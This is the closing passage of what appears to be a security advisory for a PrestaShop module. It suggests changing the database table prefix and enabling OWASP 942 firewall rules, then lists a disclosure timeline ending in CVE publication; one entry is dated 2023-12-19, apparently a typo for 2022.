*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-12-02

Issue discovered during a code reviews by 202 ecommerce

2022-12-02

Contact the author

2023-12-19

First fixed candidate from the author 4.0.15 for PrestaShop 1.7. PrestShop 1.6 remain vulnerable

2022-12-19

Contact the author to fix others vulnerabilities

2023-01-31

Contact PrestaShop team to claim a fix on all available package downloadable

2023-02-12

Request a CVE ID

2023-07-23

Publication of the CVE

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

Tag

#php